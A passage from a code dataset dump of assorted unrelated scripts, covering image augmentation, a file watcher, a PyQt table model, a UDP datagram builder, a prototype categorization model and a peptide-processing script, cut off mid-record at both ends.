== 8, \\\n 'input corners should have 8 elements'\n\n corners[:, 0::2] = corners[:, 0::2] * sx - dx\n corners[:, 1::2] = corners[:, 1::2] * sy - dy\n corners[corners < 0] = 0\n corners[corners > 1] = 1\n return corners\n\n jit = random.uniform(0.05, jitter)\n [h, w] = images.shape[0:2]\n [dh, dw] = [h * jit, w * jit]\n pleft = int(random.uniform(0, dw))\n pright = int(random.uniform(0, dw))\n ptop = int(random.uniform(0, dh))\n pbot = int(random.uniform(0, dh))\n\n swidth = w - pleft - pright\n sheight = h - ptop - pbot\n\n sx = swidth / w\n sy = sheight / h\n\n im = images.copy()\n cropped = im[ptop:h - pbot, pleft:w - pright, :]\n\n dx = (pleft / w) / sx\n dy = (ptop / h) / sy\n\n sized = cv2.resize(cropped, (w, h), interpolation=cv2.INTER_CUBIC)\n new_bbox = corners2pointxita(correct_corners(pointxita2corners(bboxes), dx, dy, 1.0 / sx, 1.0 / sy))\n return sized, new_bbox\n\n\ndef random_distort_color(images, bboxes):\n im_hsv = cv2.cvtColor(images, cv2.COLOR_BGR2HSV)\n h = random.uniform(0, 10)\n s = random.uniform(0.4, 1.2)\n v = random.uniform(0.4, 1.2)\n\n im_h = im_hsv[:, :, 0] + h\n im_h[im_h > 255] = im_h[im_h > 255] - 255\n im_h = im_h[:, :, np.newaxis]\n\n im_s = (np.round(im_hsv[:, :, 1] * s))[:, :, np.newaxis]\n im_v = (np.round(im_hsv[:, :, 2] * v))[:, :, np.newaxis]\n\n new_hsv = np.concatenate((im_h, im_s, im_v), 2)\n new_hsv[new_hsv > 255] = 255\n new_hsv = np.uint8(new_hsv)\n\n new_img = cv2.cvtColor(new_hsv, cv2.COLOR_HSV2BGR)\n return new_img, bboxes\n\n\ndef draw_bboxes(image, bboxes):\n \"\"\"\n draw bboxes on images to see if the annotations are right\n :param image:\n :param bboxes:\n :return:\n \"\"\"\n assert bboxes.shape[1] == 5, \\\n 'bboxes should have 5 columns'\n\n corners = pointxita2corners(bboxes)\n corners[:, 0::2] = np.round(corners[:, 0::2] * image.shape[1])\n corners[:, 1::2] = np.round(corners[:, 1::2] * image.shape[0])\n\n # print(corners)\n # time.sleep(50)\n\n im = image.copy()\n\n for i in range(corners.shape[0]):\n c = corners[i, :].astype(int)\n # print(c.dtype)\n for j in [0, 2, 4, 6]:\n cv2.line(im, (c[j % 8], c[(j + 1) % 8]), (c[(j + 2) % 8], c[(j + 3) % 8]), (0, 255, 0), 2)\n cv2.imshow('bboxes', im)\n cv2.waitKey()\n\n\ndef preprocess(images, bboxes, options):\n \"\"\"\n preprocess the input images and labels given options\n :param images: numpy array\n :param bboxes:\n :param options:\n :return:\n \"\"\"\n assert images.shape[2] == 3, \\\n 'input images should have 3 channels'\n assert bboxes.shape[1] == 5, \\\n 'input rotated bounding box annotation should have 5 dims'\n for key in options.keys():\n assert key in ['flip', 'crop', 'distortion'], \\\n 'the input key {:s} is not in the pre-defined list'.format(key)\n\n if options['flip'] == 1:\n images, bboxes = random_horizontal_flip(images, bboxes)\n if options['crop'] == 1:\n images, bboxes = random_crop(images, bboxes, 0.2)\n if options['distortion'] == 1:\n images, bboxes = random_distort_color(images, bboxes)\n\n draw_bboxes(images, bboxes)\n\n\nif __name__ == '__main__':\n image_path = 'test.jpg'\n anno_path = 'test.txt'\n\n image = cv2.imread(image_path)\n with open(anno_path, 'r') as f:\n raw_lines = f.readlines()\n bboxes = [line.strip().split(' ') for line in raw_lines]\n bboxes = np.vstack(bboxes)\n bboxes = bboxes[:, 1:].astype(np.float32)\n\n for i in range(10):\n preprocess(image, bboxes, {'flip': 1, 'crop': 1, 'distortion': 1})\n\n\n\n","sub_path":"lib/data_layer/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":7605,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"476428983","text":"import errno, fnmatch, logging, os, stat, threading, time\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\nclass WatcherThread(threading.Thread):\n\n\tstop = False\n\n\tdef __init__(self, folder, callback, sync_interval, files_to_include = [], files_to_ignore = [], dirs_to_ignore = []):\n\t\tself.folder = folder;\n\t\tself.callback = callback\n\n\t\tself.sync_interval = sync_interval\n\t\t\n\t\tself.files_to_include = files_to_include\n\t\tself.files_to_ignore = files_to_ignore\n\t\tself.dirs_to_ignore = dirs_to_ignore\n\n\t\tthreading.Thread.__init__(self)\n\n\tdef run(self):\n\t\tw = Watcher(self.folder, self.callback, self.files_to_include, self.files_to_ignore, self.dirs_to_ignore)\n\t\twhile not self.stop:\n\t\t\tw.loop(self.sync_interval)\n\nclass Watcher(object):\n\n\tinit_done = False\n\n\tdef __init__(self, folder, callback, files_to_include = [], files_to_ignore = [], dirs_to_ignore = []):\n\n\t\tself.folder = folder;\n\t\tself.callback = callback\n\t\t\n\t\tself.files_to_include = files_to_include\n\t\tself.files_to_ignore = files_to_ignore\n\t\tself.dirs_to_ignore = dirs_to_ignore\n\n\t\tself.files_map = {}\n\t\t\n\t\tself.update_files()\n\t\tself.init_done = True\n\n\tdef __del__(self):\t\t\n\t\tfor key, value in self.files_map.items():\n\t\t\tlogger.debug(\"unwatching %s\" % value[\"path\"])\n\n\tdef listdir(self, walk = False):\n\t\titems = []\n\t\tfor root, dir_names, file_names in os.walk(self.folder):\n\t\t\t[dir_names.remove(d) for d in dir_names if d in self.dirs_to_ignore]\n\n\t\t\tfor file_name in file_names:\n\t\t\t\tfull_path = os.path.join(root, file_name)\n\t\t\t\trel_path = os.path.relpath(full_path, self.folder)\n\n\t\t\t\tinclude_matches = [fnmatch.fnmatch(rel_path, p) for p in self.files_to_include]\n\t\t\t\tignore_matches = [fnmatch.fnmatch(rel_path, p) for p in self.files_to_ignore]\n\n\t\t\t\tif any(ignore_matches) or not any(include_matches):\n\t\t\t\t\tcontinue\n\n\t\t\t\titems += [{\"key\": rel_path, \"path\": full_path, \"dir\": os.path.dirname(rel_path), \"version\": os.path.getmtime(full_path)}]\n\t\t\n\t\treturn items\n\n\tdef loop(self, interval = 1.5):\n\t\tself.update_files()\n\t\tfor key, value in self.files_map.items():\n\t\t\tself.check_file(key, value)\n\t\ttime.sleep(interval)\n\n\tdef check_file(self, key, value):\n\t\tfile_mtime = os.path.getmtime(value[\"path\"])\n\t\tif file_mtime != value[\"version\"]:\n\t\t\tself.files_map[key][\"version\"] = file_mtime\n\n\t\t\t# Run callback if file name changes\n\t\t\tself.callback(dict({\"type\": \"m\"}, **value))\n\n\tdef update_files(self):\n\t\titems = []\n\n\t\tfor item in self.listdir():\n\t\t\tif item[\"key\"] not in self.files_map:\n\t\t\t\titems += [item]\n\t\t\n\t\t# check existent files\n\t\tfor key, value in self.files_map.copy().items():\n\t\t\tif not os.path.exists(value[\"path\"]):\n\t\t\t\tself.unwatch(value)\n\n\t\tfor item in items:\n\t\t\tif item[\"key\"] not in self.files_map:\n\t\t\t\tself.watch(item)\n\n\tdef watch(self, item):\n\t\tlogger.debug(\"watching %s\" % item[\"path\"])\n\t\tself.files_map[item[\"key\"]] = item\n\n\t\t# Run callback if file name changes\n\t\tif self.init_done:\n\t\t\tself.callback(dict({\"type\": \"c\"}, **item))\n\n\tdef unwatch(self, item):\n\t\tlogger.debug(\"unwatching %s\" % item[\"path\"])\n\t\tdel self.files_map[item[\"key\"]]\n\t\t\n\t\t# Run callback if file name changes\n\t\tself.callback(dict({\"type\": \"d\"}, **item))","sub_path":"Backup/20131003100440/Package Syncing/package_syncing/watcher.py","file_name":"watcher.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"370001607","text":"from PyQt5 import QtCore\nfrom PyQt5.QtCore import *\n\n\nclass TableModel(QAbstractTableModel):\n def __init__(self, parent=None):\n super(TableModel, self).__init__()\n self.datatable = None\n\n def update(self, data):\n print('Updating model')\n self.datatable = data\n print(f'Data: {self.datatable}')\n\n def rowCount(self, parent=QModelIndex()):\n if self.datatable:\n return len(self.datatable)\n return 0\n\n def columnCount(self, parent=QModelIndex):\n if self.datatable:\n return len(self.datatable[0])\n return 0\n\n def flags(self, index):\n flags = super(TableModel, self).flags(index)\n j = index.column()\n if j == 1:\n flags |= Qt.ItemIsEditable\n elif j == 3 or j == 4:\n flags |= Qt.ItemIsUserCheckable\n return flags\n\n def setData(self, index: QModelIndex, value, role=Qt.DisplayRole):\n i = index.row()\n j = index.column()\n if role == Qt.EditRole and j == 1:\n self.datatable[i][j] = value\n elif role == Qt.CheckStateRole and (j==3 or j==4):\n if value:\n self.datatable[i][j] = True\n else:\n self.datatable[i][j] = False\n return True\n\n def data(self, index, role=Qt.DisplayRole):\n i = index.row()\n j = index.column()\n if role == Qt.DisplayRole:\n return f'{self.datatable[i][j]}'\n elif role == Qt.CheckStateRole and (j == 3 or j == 4):\n if self.datatable[i][j]:\n return Qt.Checked\n else:\n return Qt.Unchecked\n elif role == Qt.EditRole and j == 1:\n return self.datatable[i][j]\n else:\n return QVariant()\n\n def headerData(self, section, orientation=Qt.Horizontal, role=Qt.DisplayRole):\n if role == QtCore.Qt.DisplayRole:\n if orientation == QtCore.Qt.Horizontal:\n return [\"Id\", \"Task\", \"Date\", \"Done\", \"Delete\"][section]\n if orientation == QtCore.Qt.Vertical:\n return section+1\n","sub_path":"model/TableModel.py","file_name":"TableModel.py","file_ext":"py","file_size_in_byte":2108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"108177331","text":"from db.conn import DB\nimport itertools\n\nclass combination_lexicon(object):\n\n combinationLexicon = dict()\n\n def __init__(self, products):\n self.products = products\n self.db = DB()\n self.createCombinationLexicon()\n\n \n def createCombinationLexicon(self):\n two_combinations = self.createKCombinations(2)\n three_combinations = self.createKCombinations(3)\n self.countFrequenciesAndCreateSignatures(two_combinations)\n self.countFrequenciesAndCreateSignatures(three_combinations)\n self.countDistance(2)\n self.countDistance(3)\n\n def countFrequenciesAndCreateSignatures(self, combinations):\n for titleCombinations in combinations:\n if(len(titleCombinations) > 0):\n\n for combination in titleCombinations:\n signature = self.computeSignatureOfKCombination(combination)\n\n if signature in self.combinationLexicon:\n self.combinationLexicon[signature]['count'] = self.combinationLexicon[signature]['count'] + 1\n else:\n self.combinationLexicon[signature] = dict()\n self.combinationLexicon[signature]['combination'] = str(combination)\n self.combinationLexicon[signature]['count'] = 1\n self.combinationLexicon[signature]['distance'] = 0\n\n def computeSignatureOfKCombination(self, k_combination_list_of_words):\n signatureList = list()\n for word in k_combination_list_of_words:\n id = self.db.getIdOfTokenByToken(word.lower())\n signatureList.append(int(id))\n\n signatureList.sort()\n signature = '-'.join(map(str,signatureList))\n \n return signature\n\n def createKCombination(self, product, k_combination_number_of_words):\n listToReturn = list()\n for c in itertools.combinations(product, k_combination_number_of_words):\n listToReturn.append(c)\n\n return listToReturn\n\n\n def createKCombinations(self, k_combination_number_of_words):\n k_combinations = list()\n for product in self.products:\n k_combinations.append(self.createKCombination(product.split(), k_combination_number_of_words))\n \n return k_combinations\n\n def countDistance(self, k_combination_number_of_words):\n \n for product in self.products:\n productSplit = product.split()\n k_combinations = self.createKCombination(productSplit, k_combination_number_of_words)\n \n for combination in k_combinations:\n signature = self.computeSignatureOfKCombination(combination)\n s = 0\n for word in combination:\n add = self.euclidean(combination.index(word), productSplit.index(word))\n s = s + add\n \n self.combinationLexicon[signature]['distance'] = self.combinationLexicon[signature]['distance'] + s\n\n def euclidean(self, num1, num2):\n return (num1 - num2)**2\n \n","sub_path":"combination_lexicon.py","file_name":"combination_lexicon.py","file_ext":"py","file_size_in_byte":3106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"175794724","text":"from helper import parseAddress, parsePort, getByteArray, ipSplitAdd, adder, ipConvert\r\nimport sys\r\nimport L1\r\n\r\n\r\n# Test length of command line args for sender\r\ndef testArgs():\r\n if len(sys.argv) != 7:\r\n print(\"Must use 6 command line arguments for sender, Exiting!\")\r\n sys.exit()\r\n\r\n\r\n# Main method\r\nif __name__ == '__main__':\r\n\r\n print(\"----------------------------------------------------------\")\r\n testArgs()\r\n datafn, sip, dip, sSPort, sDPort, datagramfn = str(sys.argv[1]), str(sys.argv[2]), str(sys.argv[3]), str(\r\n sys.argv[4]), str(sys.argv[5]), str(sys.argv[6])\r\n\r\n # Parse and test ip addresses\r\n sipList = parseAddress(sip)\r\n dipList = parseAddress(dip)\r\n sip = bytearray(sipList)\r\n dip = bytearray(dipList)\r\n\r\n # Parse and test ports\r\n sPort = parsePort(sSPort)\r\n dPort = parsePort(sDPort)\r\n\r\n # Get data from file and pad if necessary\r\n f0 = L1.testFile(datafn)\r\n data = f0.read()\r\n f0.close()\r\n dataLen = L1.testSize(data)\r\n print(\"Data: \" + str(data)[2:][:len(data)])\r\n pad = 0\r\n if len(data) % 2 != 0:\r\n pad = 1\r\n data = L1.pad(data)\r\n\r\n # Get key from file\r\n f1 = L1.testFile(\"key.txt\")\r\n key = f1.read()\r\n f1.close()\r\n L1.testKey(key)\r\n key = key.decode(\"utf-8\")\r\n print(\"Key: \" + key + \"\\n\")\r\n\r\n # Print info to user\r\n print(\"Data Filename: \" + datafn)\r\n print(\"Source IP: \" + str(ipConvert(sip)[0]) + \" (LE10)\")\r\n print(\"Destination IP: \" + str(ipConvert(dip)[0]) + \" (LE10)\")\r\n print(\"Source Port: \" + sSPort)\r\n print(\"Destination Port: \" + sDPort)\r\n print(\"Datagram Filename: \" + datagramfn + \"\\n\")\r\n\r\n # Encrypt and convert to bytes\r\n chunks = L1.encrypt(data, key)\r\n bData = []\r\n for a in range(0, len(chunks)):\r\n for b in range(0, len(chunks[a])):\r\n bData.append(ord(chunks[a][b]))\r\n bData = bytearray(bData)\r\n\r\n # Write encrypted data\r\n L1.writeData(\"sOut\", chunks, pad)\r\n\r\n # Get everything we nee to generate checksum\r\n siph, diph = ipSplitAdd(sip), ipSplitAdd(dip)\r\n zero, protocol = bytes([0]), bytes([17])\r\n totalLen = dataLen + 8 # Total length is the length in bytes of the datagram:the udp header and data before padding\r\n tl = getByteArray(totalLen)\r\n sp = getByteArray(int(sPort))\r\n dp = getByteArray(int(dPort))\r\n\r\n print(\"Filesize: \" + str(dataLen) + \" Bytes\")\r\n print(\"Total Length: \" + str(totalLen) + \" Bytes\")\r\n\r\n # Add everything up\r\n cs = adder(siph, diph)\r\n cs = adder(cs, zero)\r\n cs = adder(cs, protocol)\r\n cs = adder(cs, tl)\r\n cs = adder(cs, sp)\r\n cs = adder(cs, dp)\r\n cs = adder(cs, tl)\r\n\r\n # Add data\r\n for a in range(0, len(chunks)):\r\n x = chunks[a]\r\n y = bin(ord(x[0]))[2:].zfill(8) + bin(ord(x[1]))[2:].zfill(8)\r\n y = int(y, 2)\r\n cs = adder(cs, y)\r\n\r\n # take ones compliment\r\n cs = bytes.fromhex(hex(cs)[2:].zfill(4))\r\n x = int(cs.hex(), 16) ^ int(0xFFFF)\r\n cs = getByteArray(x)\r\n print(\"Checksum is: 0x\" + cs.hex())\r\n\r\n # Generate pseudo header\r\n ph = sip + dip + zero + protocol + tl\r\n if len(ph) != 12:\r\n print(\"Size of pseudo header isn't 12 bytes, Exiting!\")\r\n sys.exit()\r\n\r\n # Generate UDP Datagram\r\n udpdg = sp + dp + tl + cs + bData\r\n both = ph + udpdg\r\n\r\n # Write to datagram file\r\n file = open(datagramfn, \"wb\")\r\n file.write(both)\r\n file.close()\r\n print(\"Successfully wrote \" + datafn + \" to \" + datagramfn)\r\n print(\"----------------------------------------------------------\")\r\n","sub_path":"sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"623230301","text":"# There is a special place in hell for me after coding the following lines.\nfrom requests import get\nimport json\n\n\nurl = \"https://raw.githubusercontent.com/pffy/data-mcdonalds-nutritionfacts/master/json/mcd-pretty.json\"\nr = get(url)\n\nitems = json.loads(r.text)\n\nwith open('./Items.hs', \"w\") as f:\n f.write(\"\"\"\n-- AUTOGENERATED see load_items.py\nmodule Items where\n\nimport Item\n\nitems = [\n\"\"\")\n\n output = \",\\n\".join(\n [\" Item %s \\\"%s\\\"\" %\n (item[\"CAL\"], item[\"ITEM\"]) for item in items])\n f.write(output)\n f.write(\"\\n ]\\n\")\n","sub_path":"src/load_items.py","file_name":"load_items.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"611976620","text":"'''\nPrototype Model Based on Medin and Smith's chapter in formal methods of categorization.\n__NOTES__\n* category activations unaffected by memory strength (unlike in gcm)\n'''\n\n# Python Standard Library\nimport sys\nimport itertools\n\n# External Dependencies\nimport numpy as np \n\n\n\n##__Function to Get Pairwise Distances\ndef pairdist2d(inputs, prototypes, r, attn_weights):\n\tpair_dist = np.zeros([inputs.shape[0], prototypes.shape[0]])\n\tfor i in range(inputs.shape[0]):\n\t\tfor e in range(prototypes.shape[0]):\n\t\t\tpair_dist[i,e] = np.power(np.sum(attn_weights * (np.abs(inputs[i,:] - prototypes[e,:])**r)),(1/r))\n\treturn pair_dist\n\n\n##__GCM\ndef prototype(inputs, exemplars, memory_strength, attention_weights, settings):\t\n\t# useful variables\n\tnum_categories = memory_strength.shape[1]\n\tnum_inputs = inputs.shape[1]\n\n\t# Create Prototypes\n\tprototypes = []\n\tfor label in np.unique(exemplars[:,-1]):\n\t\tav_feature_values = np.mean(exemplars[exemplars[:,-1]==label][:,:-1], axis=0)\n\t\tprototypes.append(np.concatenate([av_feature_values, [label]]))\n\tprototypes = np.array(prototypes)\n\n\t# Scale Attention Weights\n\tattention_weights = attention_weights / np.sum(attention_weights)\n\n\t# Scale Memory Strengths\n\tz = np.sum(memory_strength, axis=1).reshape([memory_strength.shape[0],1])\n\tz = np.concatenate([z]*num_categories, axis=1)\n\tmemory_strength = np.nan_to_num(memory_strength / z)\n\n\t# Get Pairwise Distances\n\tdistances = pairdist2d(inputs, prototypes[:,:-1], settings['r'], attention_weights)\n\n\t# Calculate Similarity\n\tsimilarity = np.exp(-settings['c'] * distances)\n\n\t# Get Category Activations\n\tcategory_activation = similarity\n\tcategory_activation_rm = category_activation**settings['phi'] \n\tsums = np.array([np.sum(category_activation_rm, axis=1)]).T\n\tprobabilities = category_activation_rm / sums\n\treturn({\n\t\t'probabilities': probabilities,\n\t\t'predictions': np.argmax(probabilities, axis=1)\n\t})\n\n\n\n\n\n\n\n\n\n##__Run Model\nif __name__ == '__main__':\n\tsettings = {\n\t\t'c': 2, \t# specificity parameter\n\t\t'phi': 1, \t# response mapping parameter\n\t\t'r': 1, \t# distance metric\n\t}\n\n\t## Initialize Model Parameters\n\tattention_weights = [.5, .5]\n\n\texemplars = np.array([\n\t\t[.1, .1, 1],\n\t\t[.2, .2, 1],\n\t\t[.3, .3, 1],\n\t\t[.4, .4, 1],\n\t\t[.5, .5, 2],\n\t\t[.6, .6, 2],\n\t\t[.7, .7, 2],\n\t\t[.8, .8, 2],\n\t\t])\n\n\tmemory_strength = np.array([\n\t\t[1, 0],\n\t\t[1, 0],\n\t\t[1, 0],\n\t\t[1, 0],\n\t\t[0, 1],\n\t\t[0, 1],\n\t\t[0, 1],\n\t\t[0, 1],\n\t\t])\n\n\tinputs = np.array([\n\t\t[.1,.1],\n\t\t[.2,.2],\n\t\t[.3,.3],\n\t\t[.4, .4],\n\t\t[.5, .5],\n\t\t[.6, .6],\n\t\t[.7, .7],\n\t\t[.8, .8],\n\t\t])\n\t\n\n\t## Get Model Predictions\n\tpredictions = prototype(inputs, exemplars, memory_strength, attention_weights, settings)\n\tprint(predictions)\n\n\n\n\n\n","sub_path":"models/reference_point_models/prototype.py","file_name":"prototype.py","file_ext":"py","file_size_in_byte":2655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"485431338","text":"\"\"\"Metric.\"\"\"\n\n# pylint: disable=E1101\n\n# Wikiminer\nfrom wikiminer.tasks import Task, MetricAction\nfrom wikiminer.odm.models import Revision\nfrom wikiminer.utils.path import get_module_name\n\n# Globals\nMNAME = get_module_name(__file__)\nMNAME1 = MNAME+'_1'\nMNAME2 = MNAME+'_2'\nNS1 = 0\nNS2 = 1\n\nclass Metric(MetricAction):\n \"\"\"Metric action class.\"\"\"\n\n def execute(self, data=None):\n \"\"\"Action definition.\"\"\"\n cursor = Revision.objects.aggregate(\n { '$match': {\n 'userset': 1,\n 'ns': { '$in': [ NS1, NS2 ] },\n 'rev_size': { '$gt': 200 }\n } },\n { '$project': {\n '_id': 0,\n 'user_name': 1,\n 'n1': { '$cond': [ { '$eq': [ '$ns', NS1 ] }, 1, 0 ] },\n 'n2': { '$cond': [ { '$eq': [ '$ns', NS2 ] }, 1, 0 ] }\n } },\n { '$group': {\n '_id': '$user_name',\n MNAME1: { '$sum': '$n1' },\n MNAME2: { '$sum': '$n2' }\n } },\n { '$project': {\n '_id': 0,\n 'user_name': '$_id',\n MNAME1: 1,\n MNAME2: 1\n } },\n allowDiskUse=True\n )\n return cursor\n\n\ndef execute():\n \"\"\"Execution function.\"\"\"\n return Task(actions=[ Metric() ])\n","sub_path":"metrics/m38/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"458782925","text":"import numpy as np\nimport random\nimport matplotlib\nimport matplotlib.pyplot as plt\n\ndef main():\n mu = 55\n sigma = 5\n N = 1500000\n\n B = np.random.normal(mu, sigma, N)\n\n xBars = []\n SDs = []\n for n in range(1,201):\n x = B[random.sample(range(N),n)]\n xBars.append(np.mean(x))\n SDs.append(np.std(x, ddof=1))\n\n pos_curve1 = []\n neg_curve1 = []\n pos_curve2 = []\n neg_curve2 = []\n xVals = []\n\n for n in range(1, 201):\n pos_curve1.append(lines(mu, sigma, n, 1.96))\n neg_curve1.append(lines(mu, sigma, n, -1.96))\n pos_curve2.append(lines(mu, sigma, n, 2.58))\n neg_curve2.append(lines(mu, sigma, n, -2.58))\n xVals.append(n)\n\n graph(xBars, pos_curve1, neg_curve1, xVals,'95%' )\n graph(xBars, pos_curve2, neg_curve2, xVals, '99%')\n\n\n\ndef graph(xBars, line1, line2, xVals, percent):\n title = 'Sample means with increasing sample sizes - ' + percent + ' Confidence Interval'\n plt.scatter(xVals, xBars, marker='x')\n plt.title(title)\n plt.xlabel('Sample Size')\n plt.ylabel('x_bar')\n plt.axhline(y=55, color='black',label='mean = 55')\n\n plt.plot(xVals, line1, color='r', linestyle='--')\n plt.plot(xVals, line2, color='r', linestyle='--')\n\n plt.show()\n\n\ndef lines(mu, sigma, n, value):\n return mu + (value * (sigma/(np.sqrt(n))))\n\n\nmain()","sub_path":"Project 5/proj_5_1.py","file_name":"proj_5_1.py","file_ext":"py","file_size_in_byte":1352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"405582531","text":"import struct\n# A place for message keys\n\n\n# The protocl version\nPROTOCOL = 1 \n\n# OPCODE FLAGS\nDATA_PACKET = 1 \nPING = 2 \n\n# Initialized constants\nEMPTY = 0 \nENDIAN = 'little'\n \n# Type codes\nINVALID = '\\0'\nCHAR = 'c' \nBYTE_TYPE = 'y' \nBOOL = 'b' \nINT8 = 'p' \nUINT8 = 'r' \nUINT16 = 'q' \nINT32 = 'i' \nINT = INT32\nUINT32 = 'u' \nINT64 = 'x'\nUINT64 = 't' \nFLOAT = 'f' \nDOUBLE = 'd' \nSTRING = 's' \nOBJECT = 'o' \nARRAY = 'a' \n\n\n# I had a lot of fun with lambdas\n# Each element has an assert and a serialize callback\n# 1st lambda checks that the data is valid, second returns a byte version of that data\nserialize_funcs = {\n INVALID : ((lambda val, byte_length: False), \n (lambda val: False)),\n\n CHAR : ((lambda val, byte_length: byte_length == 1 and type(val) == str and len(val) == 1), \n (lambda val: ord(val))),\n\n BYTE_TYPE : ((lambda val, byte_length: byte_length == 1 and type(val) == bytes and len(val) == 1), \n (lambda val: val)),\n\n BOOL : ((lambda val, byte_length: byte_length == 1 and type(val) == bool), \n (lambda val: 1 if val else 0)),\n\n INT8 : ((lambda val, byte_length: byte_length == 1 and type(val) == int and val < 128 and val > -129),\n (lambda val : val.to_bytes(1, byteorder = ENDIAN, signed = True))),\n\n UINT8 : ((lambda val, byte_length: byte_length == 1 and type(val) == int and val < 256),\n (lambda val : val.to_bytes(1, byteorder = ENDIAN, signed = False))),\n\n UINT16 : ((lambda val, byte_length: byte_length == 2 and type(val) == int and val < 65536),\n (lambda val : val.to_bytes(2, byteorder = ENDIAN, signed = False))),\n\n INT32 : ((lambda val, byte_length: byte_length == 4 and type(val) == int and val < 2147483648 and val > -2147483649),\n (lambda val : val.to_bytes(4, byteorder = ENDIAN, signed = True))),\n\n UINT32 : ((lambda val, byte_length: byte_length == 4 and type(val) == int and val < 4294967296),\n (lambda val : val.to_bytes(4, byteorder = ENDIAN, signed = False))),\n\n INT64 : ((lambda val, byte_length: byte_length == 8 and type(val) == int and val < 9223372036854775808 and val > -9223372036854775809), \n (lambda val : val.to_bytes(8, byteorder = ENDIAN, signed = True))),\n\n UINT64 : ((lambda val, byte_length: byte_length == 8 and type(val) == int and val < 18446744073709551616), \n (lambda val : val.to_bytes(8, byteorder = ENDIAN, signed = False))),\n\n FLOAT : ((lambda val, byte_length: byte_length == 4 and type(val) == float), \n (lambda val : struct.pack(\"f\", val))),\n\n DOUBLE : ((lambda val, byte_length: byte_length == 8 and type(val) == float), \n (lambda val : struct.pack(\"d\", val))),\n\n STRING : ((lambda val, byte_length: type(val) == str and len(val) + 1 == byte_length),\n (lambda val : val.encode('utf-8') + b'\\x00')),\n\n OBJECT : ((lambda val, byte_length: False),\n (lambda val : print(\"Idiot, don't serielaize objects\"))),\n\n ARRAY : ((lambda val, byte_length: type(val) == bytearray and len(val) == byte_length),\n (lambda val : val))}\n\n# Stores and reivieves the index and values of a data element setting data size, the fact that it is positive or negative where it is and its value.\nclass DataElement:\n def __init__(self, value, data_size, index, signed):\n self.data_size = data_size\n self.signed = signed\n self.data = value\n self.index = index\n\n def serialize(self) -> bytes:\n return self.data.to_bytes(self.data_size, byteorder = ENDIAN, signed = self.signed)\n\ndefault_header = {\n \"PROTOCOL\" : DataElement(PROTOCOL, 1, 0, False),\n \"OPCODE\" : DataElement(DATA_PACKET, 1, 1, False),\n \"FUNCFLAGS\" : DataElement(EMPTY, 2, 2, False),\n \"CHECKSUM\" : DataElement(EMPTY, 2, 4, False),\n \"BYTE_LENGTH\" : DataElement(13, 4, 6, False),\n \"FIELDS\" : DataElement(EMPTY, 2, 10, False) }\n\ndefault_ping = {\n \"PROTOCOL\" : DataElement(PROTOCOL, 1, 0, False),\n \"OPCODE\" : DataElement(PING, 1, 1, False),\n \"TYPE\" : DataElement(EMPTY, 1, 2, False),\n \"CODE\" : DataElement(EMPTY, 2, 3, False),\n \"CHECKSUM\" : DataElement(EMPTY, 2, 5, False),\n \"EXCESS\" : DataElement(EMPTY, 8, 7, False) }\n\n","sub_path":"sentinet/message/MessageKeys.py","file_name":"MessageKeys.py","file_ext":"py","file_size_in_byte":4485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"620751137","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Aug 13 14:08:54 2019\r\n\r\n@author: mstambou\r\n\r\nscript that will go over two FDR filtered TSVs, the first one being the TSV\r\nfor the HEG, and the second one being the TSV for the top N expanded genomes.\r\n\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport sys\r\nimport os\r\n\r\nif len(sys.argv) != 4:\r\n print('please enter three command line argument to run this script, example to run python3 get_uniquePeptides.py /dir/to/MSGF+/output/ mgf_fname top_n')\r\n\r\nelse:\r\n out_dir = sys.argv[1]\r\n mgf_fname = sys.argv[2]\r\n top_n = sys.argv[3]\r\n\r\nribP_elonF_dir = out_dir+mgf_fname+'_ribP_elonF/'\r\nextended_db_dir = out_dir+mgf_fname+'_extended_db_search/'\r\n\r\nribP_elonF_file = [item for item in os.listdir(ribP_elonF_dir) if item.endswith('.tsv.0.01.tsv')][0]\r\nextended_db_file = [item for item in os.listdir(extended_db_dir) if item.endswith(top_n+'CoveringMostPeptides.tsv.0.01.tsv')][0]\r\n\r\nribP_elonF_df = pd.read_csv(ribP_elonF_dir + ribP_elonF_file, sep = '\\t', header = None)\r\nextended_db_df = pd.read_csv(extended_db_dir + extended_db_file, sep = '\\t', header = None)\r\n\r\nribP_elonF_peptides = [''.join(filter(str.isalpha, item)) for item in list(ribP_elonF_df[9])]\r\nextended_db_peptides = [''.join(filter(str.isalpha, item)) for item in list(extended_db_df[9])]\r\n\r\nribP_elonF_peptides = list(set(ribP_elonF_peptides))\r\nextended_db_peptides = list(set(extended_db_peptides))\r\n\r\nall_peptides = list()\r\nall_peptides.extend(ribP_elonF_peptides)\r\nall_peptides.extend(extended_db_peptides)\r\n\r\nall_peptides = list(set(all_peptides))\r\n\r\nwith open(out_dir + 'unique_peptides/'+mgf_fname+'_ribP_elonF_peptides.fasta', 'w') as out_f:\r\n for i, peptide in enumerate(ribP_elonF_peptides):\r\n out_f.write('>peptide'+str(i+1)+'\\n')\r\n out_f.write(peptide+'\\n')\r\n\r\nwith open(out_dir + 'unique_peptides/'+mgf_fname+'top'+str(top_n)+'_extended.fasta', 'w') as out_f:\r\n for i, peptide in enumerate(extended_db_peptides):\r\n 